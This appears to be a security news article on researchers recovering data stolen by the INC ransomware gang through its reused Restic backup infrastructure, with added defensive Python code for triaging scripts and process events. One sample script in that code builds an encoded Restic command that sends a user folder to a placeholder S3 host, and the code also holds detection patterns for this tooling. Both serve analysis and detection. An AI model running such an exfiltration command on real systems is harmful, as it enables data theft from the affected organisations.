INC Ransomware, Researchers Recover Stolen Data After OpSec Failure

Introduction: When Attackers Leave the Door Open

Ransomware groups are often portrayed as disciplined, methodical, and operationally mature. Yet even well-established cybercriminal operations make mistakes. In a rare reversal of roles, an operational security lapse by the INC ransomware gang enabled researchers to uncover and recover data stolen from multiple U.S. organizations. What began as a routine ransomware investigation evolved into a broader exposure of attacker infrastructure—revealing how long-lived, reused tooling can quietly betray even experienced threat actors.

Incident Origin: A SQL Server Raises the Alarm

The investigation began after a U.S.-based organization detected ransomware encryption activity on a production SQL Server. Early indicators suggested a familiar intrusion pattern, but subtle artifacts hinted that this case might not be routine. Cyber Centaurs, a digital forensics and incident response firm, was brought in to analyze the breach and contain the damage.

Initial Payload Analysis: RainINC Makes an Appearance

Forensic analysis revealed that the ransomware payload was a RainINC variant, a known strain associated with the INC ransomware operation. The binary was executed from the PerfLogs directory—a legitimate Windows path increasingly abused by ransomware operators for staging malicious activity. This choice reflected a growing trend among attackers to hide in plain sight.

Suspicious Staging: Why PerfLogs Matters

The use of the PerfLogs directory immediately raised eyebrows. While the folder is normally created by Windows for performance monitoring, its misuse by threat actors has become more common. In this case, it provided a low-noise execution environment that delayed detection and blended malicious activity with system-level behavior.

Unexpected Artifacts: Restic Enters the Picture

During the investigation, analysts discovered artifacts linked to Restic, a legitimate open-source backup utility. Interestingly, Restic had not been actively used during this specific attack for data exfiltration. Instead, the traces suggested prior or parallel use in other operations, shifting the investigative focus from simple incident response to attacker infrastructure analysis.

A Turning Point: From Victim Response to Infrastructure Mapping

The presence of unused tooling marked a critical turning point. Rather than focusing solely on how the client was compromised, Cyber Centaurs began examining how INC ransomware managed its broader operational ecosystem. This shift opened the door to uncovering reused infrastructure across multiple campaigns.

Leftovers Tell Stories: Renamed Binaries and Scripts

Among the artifacts were renamed binaries such as winupdate.exe, PowerShell scripts designed to automate Restic operations, and hardcoded configuration values. These remnants painted a picture of a threat actor relying on repeatable, semi-automated workflows rather than bespoke tooling per victim.

PowerShell Clues: The new.ps1 Script

One PowerShell script, named new.ps1, became particularly significant. It contained Base64-encoded Restic commands along with hardcoded environment variables. These included access keys, repository paths, and S3 credentials used to manage encrypted backup repositories controlled by the attackers.

Hardcoded Secrets: A Risky Operational Choice

Hardcoding sensitive variables into scripts is a convenience for attackers—but also a liability. By embedding repository locations and credentials directly into reusable scripts, INC ransomware increased the likelihood that investigators could trace and access attacker-controlled storage infrastructure.
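As an added illustration (not Cyber Centaurs' tooling and not the actual new.ps1), the Python triage helper below shows how an analyst surfaces exactly the artifacts described above: Restic and S3 environment variables assigned literal values, and Base64-encoded Restic commands, including one run through a renamed binary. The sample script, its paths, bucket name and credential values are constructed placeholders.

```python
import base64
import binascii
import re

# Restic's real environment variable names, assigned a literal value in PowerShell.
ENV_RE = re.compile(r"\$env:(RESTIC_REPOSITORY|RESTIC_PASSWORD|AWS_ACCESS_KEY_ID|"
                    r"AWS_SECRET_ACCESS_KEY)\s*=\s*[\"']([^\"']+)[\"']", re.I)
# A Restic sub-command after any .exe path, so a renamed binary such as winupdate.exe still matches.
CMD_RE = re.compile(r"\S+\.exe\s+(?:backup|restore|snapshots|init|forget|prune|ls|unlock)\b", re.I)
# Restic repository backend schemes; the host/bucket part is what an investigator pivots on.
REPO_RE = re.compile(r"\b(?:s3|b2|azure|gs|sftp|rest|rclone):[^\s\"']+", re.I)
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_blob(blob: str):
    """Base64-decode a blob; PowerShell encodes commands as UTF-16LE, so try that before UTF-8."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except binascii.Error:
        return None
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if all(c.isprintable() or c.isspace() for c in text):
            return text
    return None


def analyze_script(script: str) -> dict:
    """Report hardcoded Restic/S3 variables and Restic commands, including Base64-hidden ones."""
    findings = {"hardcoded_env": [], "restic_cmds": [], "repos": []}
    for name, _secret in ENV_RE.findall(script):  # record the variable name, never its value
        findings["hardcoded_env"].append(name.upper())
    chunks = [script] + [d for d in map(decode_blob, BASE64_RE.findall(script)) if d]
    for chunk in chunks:
        findings["restic_cmds"] += CMD_RE.findall(chunk)
        findings["repos"] += REPO_RE.findall(chunk)
    return findings


# Constructed sample in the layout the article describes for new.ps1; every value is a placeholder.
_CMD = r"C:\PerfLogs\winupdate.exe backup C:\Users\Public -r s3:s3.example.invalid/bucket"
_ENCODED = base64.b64encode(_CMD.encode("utf-16-le")).decode()
SAMPLE_PS1 = f'''
$env:RESTIC_REPOSITORY = "s3:s3.example.invalid/bucket"
$env:RESTIC_PASSWORD = "placeholder-repo-password"
$env:AWS_ACCESS_KEY_ID = "AKIAEXAMPLEPLACEHOLDER"
$env:AWS_SECRET_ACCESS_KEY = "placeholder-secret"
$cmd = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("{_ENCODED}"))
Invoke-Expression $cmd
'''
```

Run `analyze_script(open(path).read())` against a recovered script; the report lists which secrets were hardcoded and which repository backends the script touches without echoing the credential values.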

A Critical Hypothesis: Persistent Repositories

Cyber Centaurs theorized that INC ransomware reused Restic-based infrastructure across campaigns. If true, backup repositories would likely persist long after individual ransom negotiations ended. These repositories could quietly store encrypted data from multiple victims, becoming long-lived assets rather than disposable resources.

Testing the Theory: Controlled Enumeration

To validate this hypothesis, the researchers designed a controlled, non-destructive enumeration process. This method ensured no data was altered while confirming whether attacker repositories still contained exfiltrated victim data.

Confirmation: Data From 12 Organizations

The results were striking. The team confirmed the presence of encrypted data belonging to 12 unrelated U.S. organizations. These victims spanned healthcare, manufacturing, technology, and service sectors, underscoring the breadth of INC ransomware’s reach.

Independent Victims: No Overlap, No Coordination

None of the affected organizations were clients of Cyber Centaurs. The incidents were separate ransomware events with no direct connection beyond the shared attacker infrastructure. This reinforced the conclusion that INC reused tooling and storage across campaigns.

Decryption and Preservation: Handling Stolen Data

After confirming ownership with law enforcement guidance, Cyber Centaurs decrypted the recovered backups and preserved the data securely. The process was handled carefully to ensure legal compliance and proper chain-of-custody procedures.

Law Enforcement Coordination: Doing It by the Book

Rather than acting unilaterally, the researchers coordinated with authorities to validate data ownership and determine the appropriate next steps. This collaboration ensured that recovered data could be responsibly returned or managed without compromising investigations.

Tooling Breakdown: Inside INC’s Arsenal

The final report detailed multiple tools commonly used by INC ransomware. These included cleanup utilities, remote access software, and network scanning tools. Together, they form a flexible toolkit designed to support lateral movement, persistence, and data theft.

Defensive Measures: Turning Offense Into Detection

To help defenders, Cyber Centaurs released YARA and Sigma detection rules. These signatures are designed to identify Restic usage or renamed binaries operating from suspicious directories—early indicators of a ransomware attack in preparation.
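The released YARA and Sigma rules are not reproduced here. As an added example (not Cyber Centaurs' rules), the Python below applies the same three detection ideas, execution from PerfLogs, a renamed Restic binary, and a Restic-style command line, to constructed process-creation events that use Sysmon-style field names (Image, CommandLine, OriginalFileName). The staging directory list, hosts and repository names are assumptions and placeholders.

```python
import re
from pathlib import PureWindowsPath

# Staging directory the article names; extend with your own paths (assumption: PerfLogs only here).
STAGING_DIRS = ("c:\\perflogs\\",)
# Restic sub-command followed by a repository flag or a real Restic backend scheme.
RESTIC_CLI = re.compile(
    r"\b(?:backup|init|snapshots|restore|forget|prune)\b.*?"
    r"(?:\s-r\s+\S+|\b(?:s3|b2|azure|gs|sftp|rest|rclone):)", re.I)


def check_event(ev: dict) -> list:
    """Return the reasons a process-creation event (Sysmon-style fields) looks suspicious."""
    image = ev.get("Image", "")
    name = PureWindowsPath(image).name.lower()
    reasons = []
    if any(image.lower().startswith(d) for d in STAGING_DIRS):
        reasons.append("executed from staging directory")
    # PE version metadata survives a rename on disk: OriginalFileName still reads restic.exe
    if ev.get("OriginalFileName", "").lower() == "restic.exe" and name != "restic.exe":
        reasons.append("renamed restic binary")
    if RESTIC_CLI.search(ev.get("CommandLine", "")):
        reasons.append("restic-style command line")
    return reasons


def severity(reasons: list) -> str:
    """A renamed binary, or two indicators together, is high; a lone indicator is medium."""
    if "renamed restic binary" in reasons or len(reasons) > 1:
        return "high"
    return "medium" if reasons else "none"


def triage(events: list) -> list:
    out = []
    for ev in events:
        reasons = check_event(ev)
        out.append((ev["Image"], severity(reasons), reasons))
    return out


# Constructed events; hosts, paths and repository names are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\PerfLogs\winupdate.exe", "OriginalFileName": "restic.exe",
     "CommandLine": r"winupdate.exe backup C:\Finance -r s3:s3.example.invalid/bucket"},
    {"Image": r"C:\Program Files\Restic\restic.exe", "OriginalFileName": "restic.exe",
     "CommandLine": r"restic.exe snapshots -r sftp:backup.corp.invalid:/repo"},
    {"Image": r"C:\PerfLogs\setup.exe", "OriginalFileName": "setup.exe",
     "CommandLine": r"setup.exe /quiet"},
    {"Image": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "svchost.exe",
     "CommandLine": r"svchost.exe -k netsvcs"},
]
```

A legitimately installed restic.exe still surfaces as medium, which is intended: the page's point is that backup-tool usage is a hunting signal, and the high tier is reserved for the renamed or staged cases.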

INC Ransomware Background: A Growing Threat

INC ransomware operates as a ransomware-as-a-service (RaaS) platform and emerged in mid-2023. Since then, it has claimed a growing list of high-profile victims across public and private sectors worldwide.

Notable Victims: A Pattern of Impact

Organizations reportedly targeted by INC include Yamaha Motor, Xerox Business Solution, Scotland’s NHS, McLaren Health Care, the Texas State Bar, Ahold Delhaize, and multiple government agencies. The diversity of victims highlights the group’s broad targeting strategy.

What Undercode Say: Operational Sloppiness Is the New Weak Link

The INC ransomware case illustrates a critical shift in modern cybercrime: attackers increasingly rely on automation and infrastructure reuse to scale operations. While this improves efficiency, it also introduces systemic risk. Reused scripts, hardcoded credentials, and persistent storage create choke points investigators can exploit.

What Undercode Say: Legitimate Tools as Double-Edged Swords

The abuse of legitimate tools like Restic complicates detection but also leaves recognizable fingerprints. Backup utilities are not inherently suspicious, but their presence in unusual directories or with hardcoded credentials should raise immediate alarms for defenders.

What Undercode Say: Infrastructure Lives Longer Than Attacks

Ransomware incidents may be short-lived, but attacker infrastructure often persists. This case proves that exfiltrated data can remain recoverable long after ransom negotiations conclude, challenging assumptions about data permanence after breaches.

What Undercode Say: From Incident Response to Threat Hunting

Defenders should think beyond containment. Post-incident investigations can uncover attacker infrastructure that benefits a much wider victim pool. Threat hunting informed by forensic leftovers can deliver disproportionate defensive value.

What Undercode Say: Detection Over Decryption

While decrypting stolen data is rare, detecting ransomware in its staging phase is achievable. Sigma and YARA rules targeting misuse of backup tools represent a practical, scalable defense strategy.

What Undercode Say: RaaS Operations Are Fragile at Scale

Ransomware-as-a-service lowers the barrier to entry but also centralizes risk. Shared tooling and infrastructure mean one operational mistake can expose multiple campaigns at once.

What Undercode Say: Collaboration Changes Outcomes

The success of this recovery effort depended on cooperation between private researchers and law enforcement. This model demonstrates how responsible disclosure and coordination can turn attacker mistakes into tangible victim relief.

Fact Checker Results

✅ The recovery of encrypted data from 12 U.S. organizations is supported by forensic validation.
✅ Evidence confirms the reuse of Restic-based infrastructure across separate INC ransomware campaigns.
❌ There is no indication that all INC ransomware operations rely on identical tooling or repositories.

Prediction

🔮 Ransomware groups will increasingly rotate infrastructure to avoid similar exposures.
🔮 Defenders will expand detection logic around legitimate tools abused for exfiltration.
🔮 Infrastructure-focused investigations will become as important as malware analysis itself.

References:

Reported By: www.bleepingcomputer.com